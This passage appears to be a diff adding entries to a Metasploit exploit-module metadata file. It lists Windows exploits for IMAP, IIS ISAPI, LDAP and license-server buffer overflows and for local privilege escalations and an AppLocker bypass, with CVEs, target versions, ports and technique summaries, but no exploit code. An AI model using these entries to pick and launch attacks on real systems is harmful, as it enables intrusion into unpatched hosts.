"2006-03-17", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n Since the room for shellcode is small, using the reverse ordinal payloads\n yields the best results.", + "references": [ + "CVE-2006-1255", + "OSVDB-23950", + "BID-17138", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercur_login.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercur_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercury_login": { + 
"name": "Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow", + "fullname": "exploit/windows/imap/mercury_login", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-03-06", + "type": "exploit", + "author": [ + "mu-b", + "MC ", + "Ivan Racic" + ], + "description": "This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n LOGIN verb. By sending a specially crafted login command, a buffer\n is corrupted, and code execution is possible. This vulnerability was\n discovered by (mu-b at digit-labs.org).", + "references": [ + "CVE-2007-1373", + "EDB-3418" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercury_login.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercury_login", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercury_rename": { + "name": "Mercury/32 v4.01a IMAP RENAME Buffer Overflow", + "fullname": "exploit/windows/imap/mercury_rename", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow vulnerability in the\n Mercury/32 v.4.01a IMAP service.", + "references": [ + "CVE-2004-1211", + "OSVDB-12508", + "BID-11775", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=15867" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercury_rename.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercury_rename", + 
"check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_append": { + "name": "Novell NetMail IMAP APPEND Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_append", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-12-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2006-6425", + "OSVDB-31362", + "BID-21723", + "ZDI-06-054" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_append.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_append", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_auth": { + "name": "Novell NetMail IMAP AUTHENTICATE Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_auth", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-01-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. 
Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.", + "references": [ + "OSVDB-55175" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_auth.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_auth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_status": { + "name": "Novell NetMail IMAP STATUS Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_status", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-11-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2005-3314", + "OSVDB-20956", + "BID-15491" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_status.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_status", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_subscribe": { + "name": "Novell NetMail IMAP SUBSCRIBE Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_subscribe", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-12-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2006-6761", + "OSVDB-31360", + "BID-21728", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_subscribe.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_subscribe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/ms00_094_pbserver": { + "name": "MS00-094 Microsoft IIS Phone Book Service Overflow", + "fullname": "exploit/windows/isapi/ms00_094_pbserver", + "aliases": [], + "rank": 400, + "disclosure_date": "2000-12-04", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This is an exploit for the Phone Book Service /pbserver/pbserver.dll\n described in MS00-094. By sending an overly long URL argument\n for phone book updates, it is possible to overwrite the stack. 
This\n module has only been tested against Windows 2000 SP1.", + "references": [ + "CVE-2000-1089", + "OSVDB-463", + "BID-2048", + "MSB-MS00-094" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP1", + "Windows 2000 SP0", + "Windows NT SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/ms00_094_pbserver.rb", + "is_install_path": true, + "ref_name": "windows/isapi/ms00_094_pbserver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/ms03_022_nsiislog_post": { + "name": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", + "fullname": "exploit/windows/isapi/ms03_022_nsiislog_post", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-06-25", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. 
This vulnerability was addressed by MS03-022.", + "references": [ + "CVE-2003-0349", + "OSVDB-4535", + "BID-8035", + "MSB-MS03-022", + "URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Brute Force", + "Windows 2000 -MS03-019", + "Windows 2000 +MS03-019", + "Windows XP -MS03-019" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb", + "is_install_path": true, + "ref_name": "windows/isapi/ms03_022_nsiislog_post", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/ms03_051_fp30reg_chunked": { + "name": "MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow", + "fullname": "exploit/windows/isapi/ms03_051_fp30reg_chunked", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-11-11", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This is an exploit for the chunked encoding buffer overflow\n described in MS03-051 and originally reported by Brett\n Moore. This particular modules works against versions of\n Windows 2000 between SP0 and SP3. 
Service Pack 4 fixes the\n issue.", + "references": [ + "CVE-2003-0822", + "OSVDB-2952", + "BID-9007", + "MSB-MS03-051" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP0-SP3", + "Windows 2000 07/22/02", + "Windows 2000 10/06/99" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb", + "is_install_path": true, + "ref_name": "windows/isapi/ms03_051_fp30reg_chunked", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/rsa_webagent_redirect": { + "name": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow", + "fullname": "exploit/windows/isapi/rsa_webagent_redirect", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-10-21", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. 
This ISAPI filter runs in-process with\n inetinfo.exe, any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.", + "references": [ + "CVE-2005-4734", + "OSVDB-20151" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "RSA WebAgent 5.2", + "RSA WebAgent 5.3", + "RSA WebAgent 5.2 on Windows 2000 English", + "RSA WebAgent 5.3 on Windows 2000 English", + "RSA WebAgent 5.2 on Windows XP SP0-SP1 English", + "RSA WebAgent 5.3 on Windows XP SP0-SP1 English", + "RSA WebAgent 5.2 on Windows XP SP2 English", + "RSA WebAgent 5.3 on Windows XP SP2 English", + "RSA WebAgent 5.2 on Windows 2003 English SP0", + "RSA WebAgent 5.3 on Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/rsa_webagent_redirect.rb", + "is_install_path": true, + "ref_name": "windows/isapi/rsa_webagent_redirect", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/isapi/w3who_query": { + "name": "Microsoft IIS ISAPI w3who.dll Query String Overflow", + "fullname": "exploit/windows/isapi/w3who_query", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-12-06", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the w3who.dll ISAPI\n application. This vulnerability was discovered Nicolas\n Gregoire and this code has been successfully tested against\n Windows 2000 and Windows XP (SP2). 
When exploiting Windows\n XP, the payload must call RevertToSelf before it will be\n able to spawn a command shell.", + "references": [ + "CVE-2004-1134", + "OSVDB-12258", + "URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html", + "BID-11820" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Detection", + "Windows 2000 RESKIT DLL [Windows 2000]", + "Windows 2000 RESKIT DLL [Windows XP]" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/isapi/w3who_query.rb", + "is_install_path": true, + "ref_name": "windows/isapi/w3who_query", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ldap/imail_thc": { + "name": "IMail LDAP Service Buffer Overflow", + "fullname": "exploit/windows/ldap/imail_thc", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-02-17", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow in the LDAP service that is\n part of the IMail product. 
This module was tested against\n version 7.10 and 8.5, both running on Windows 2000.", + "references": [ + "CVE-2004-0297", + "OSVDB-3984", + "BID-9682", + "URL-http://web.archive.org/web/20060110155821/http://secunia.com:80/advisories/10880/" + ], + "platform": "Windows", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English", + "Windows 2000 IMail 8.x" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/ldap/imail_thc.rb", + "is_install_path": true, + "ref_name": "windows/ldap/imail_thc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ldap/pgp_keyserver7": { + "name": "Network Associates PGP KeyServer 7 LDAP Buffer Overflow", + "fullname": "exploit/windows/ldap/pgp_keyserver7", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-07-16", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the LDAP service that is\n part of the NAI PGP Enterprise product suite. This module was tested\n against PGP KeyServer v7.0. 
Due to space restrictions, egghunter is\n used to find our payload - therefore you may wish to adjust WfsDelay.", + "references": [ + "CVE-2001-1320", + "OSVDB-4742", + "BID-3046", + "URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/" + ], + "platform": "Windows", + "arch": "", + "rport": 389, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal PGPcertd.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ldap/pgp_keyserver7.rb", + "is_install_path": true, + "ref_name": "windows/ldap/pgp_keyserver7", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/calicclnt_getconfig": { + "name": "Computer Associates License Client GETCONFIG Overflow", + "fullname": "exploit/windows/license/calicclnt_getconfig", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-03-02", + "type": "exploit", + "author": [ + "hdm ", + "aushack " + ], + "description": "This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. 
If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.", + "references": [ + "CVE-2005-0581", + "OSVDB-14389", + "BID-12705", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" + ], + "platform": "Windows", + "arch": "", + "rport": 10203, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English", + "Windows XP English SP0-1", + "Windows XP English SP2", + "Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/calicclnt_getconfig.rb", + "is_install_path": true, + "ref_name": "windows/license/calicclnt_getconfig", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/calicserv_getconfig": { + "name": "Computer Associates License Server GETCONFIG Overflow", + "fullname": "exploit/windows/license/calicserv_getconfig", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-03-02", + "type": "exploit", + "author": [ + "hdm ", + "aushack " + ], + "description": "This module exploits an vulnerability in the CA License Server\n network service. 
By sending an excessively long GETCONFIG\n packet the stack may be overwritten.", + "references": [ + "CVE-2005-0581", + "OSVDB-14389", + "BID-12705", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213" + ], + "platform": "Windows", + "arch": "", + "rport": 10202, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English", + "Windows XP English SP0-1", + "Windows XP English SP2", + "Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/calicserv_getconfig.rb", + "is_install_path": true, + "ref_name": "windows/license/calicserv_getconfig", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/flexnet_lmgrd_bof": { + "name": "FlexNet License Server Manager lmgrd Buffer Overflow", + "fullname": "exploit/windows/license/flexnet_lmgrd_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-23", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Alexander Gavrun", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.", + "references": [ + "OSVDB-81899", + "BID-52718", + "ZDI-12-052", + "URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt", + "URL-http://www.flexerasoftware.com/pl/13057.htm" + ], + "platform": "Windows", + "arch": "", + "rport": 27000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Debug", + "Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3", + "Alias License Tools 
10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3", + "Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb", + "is_install_path": true, + "ref_name": "windows/license/flexnet_lmgrd_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/license/sentinel_lm7_udp": { + "name": "SentinelLM UDP Buffer Overflow", + "fullname": "exploit/windows/license/sentinel_lm7_udp", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-03-07", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a simple stack buffer overflow in the Sentinel\n License Manager. The SentinelLM service is installed with a\n wide selection of products and seems particular popular with\n academic products. If the wrong target value is selected,\n the service will crash and not restart.", + "references": [ + "CVE-2005-0353", + "OSVDB-14605", + "BID-12742" + ], + "platform": "Windows", + "arch": "", + "rport": 5093, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6", + "SentinelLM 7.2.0.0 Windows 2000 English", + "SentinelLM 7.2.0.0 Windows 2000 German", + "SentinelLM 7.2.0.0 Windows XP English SP0/SP1", + "SentinelLM 7.2.0.0 Windows 2003 English SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/license/sentinel_lm7_udp.rb", + "is_install_path": true, + "ref_name": "windows/license/sentinel_lm7_udp", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/local/adobe_sandbox_adobecollabsync": { + "name": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", + "fullname": 
"exploit/windows/local/adobe_sandbox_adobecollabsync", + "aliases": [], + "rank": 500, + "disclosure_date": "2013-05-14", + "type": "exploit", + "author": [ + "Felipe Andres Manzano", + "juan vazquez " + ], + "description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.", + "references": [ + "CVE-2013-2730", + "OSVDB-93355", + "URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Adobe Reader X 10.1.4 / Windows 7 SP1" + ], + "mod_time": "2022-12-04 17:41:24 +0000", + "path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb", + "is_install_path": true, + "ref_name": "windows/local/adobe_sandbox_adobecollabsync", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/agnitum_outpost_acs": { + "name": "Agnitum Outpost Internet Security Local Privilege Escalation", + "fullname": "exploit/windows/local/agnitum_outpost_acs", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-08-02", + "type": "exploit", + "author": [ + "Ahmad Moghimi", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. 
The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).", + "references": [ + "OSVDB-96208", + "EDB-27282" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Agnitum Outpost Internet Security 8.1" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb", + "is_install_path": true, + "ref_name": "windows/local/agnitum_outpost_acs", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/alpc_taskscheduler": { + "name": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation", + "fullname": "exploit/windows/local/alpc_taskscheduler", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-08-27", + "type": "exploit", + "author": [ + "SandboxEscaper", + "bwatters-r7", + "asoto-r7", + "Jacob Robles" + ], + "description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. 
After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.", + "references": [ + "CVE-2018-8440", + "URL-https://github.com/SandboxEscaper/randomrepo/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/alpc_taskscheduler.rb", + "is_install_path": true, + "ref_name": "windows/local/alpc_taskscheduler", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "os-resource-loss" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/always_install_elevated": { + "name": "Windows AlwaysInstallElevated MSI", + "fullname": "exploit/windows/local/always_install_elevated", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-18", + "type": "exploit", + "author": [ + "Ben Campbell ", + "Parvez Anwar" + ], + "description": "This module checks the AlwaysInstallElevated registry keys which dictates if\n .MSI files should be installed with elevated privileges (NT AUTHORITY\\SYSTEM).\n The generated .MSI file has an embedded executable which is extracted and run\n by the installer. 
After execution the .MSI file intentionally fails installation\n (by calling some invalid VBS) to prevent it being registered on the system.\n By running this with the /quiet argument the error will not be seen by the user.", + "references": [ + "URL-http://www.greyhathacker.net/?p=185", + "URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx", + "URL-http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/always_install_elevated.rb", + "is_install_path": true, + "ref_name": "windows/local/always_install_elevated", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/anyconnect_lpe": { + "name": "Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)", + "fullname": "exploit/windows/local/anyconnect_lpe", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-08-05", + "type": "exploit", + "author": [ + "Yorick Koster", + "Antoine Goichot (ATGO)", + "Christophe De La Fuente" + ], + "description": "The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.8.02042 is vulnerable to path traversal and allows local attackers\n to create/overwrite files in arbitrary locations with system level privileges.\n\n The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers\n to execute code on the affected machine with with system level privileges.\n\n Both attacks consist in sending a specially crafted IPC request to the TCP\n port 62522 on the loopback device, which is exposed by the Cisco AnyConnect\n 
Secure Mobility Agent service. This service will then launch the vulnerable\n installer component (`vpndownloader`), which copies itself to an arbitrary\n location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being\n executed with system privileges. Since `vpndownloader` is also vulnerable to DLL\n hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same\n location `vpndownloader` will be copied to get code execution with system\n privileges.\n\n The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect\n Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10\n version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been\n successfully tested against Cisco AnyConnect Secure Mobility Client versions\n 4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version\n 1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).", + "references": [ + "URL-https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj", + "CVE-2020-3153", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW", + "CVE-2020-3433" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86/x64 with x86 payload" + ], + "mod_time": "2023-01-28 09:08:51 +0000", + "path": "/modules/exploits/windows/local/anyconnect_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/anyconnect_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, 
+ "exploit_windows/local/applocker_bypass": { + "name": "AppLocker Execution Prevention Bypass", + "fullname": "exploit/windows/local/applocker_bypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-08-03", + "type": "exploit", + "author": [ + "Casey Smith", + "OJ Reeves" + ], + "description": "This module will generate a .NET service executable on the target and utilize\n InstallUtil to run the payload bypassing the AppLocker protection.\n\n Currently only the InstallUtil method is provided, but future methods can be\n added easily.", + "references": [ + "URL-https://gist.github.com/subTee/fac6af078937dda81e57" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/local/applocker_bypass.rb", + "is_install_path": true, + "ref_name": "windows/local/applocker_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], 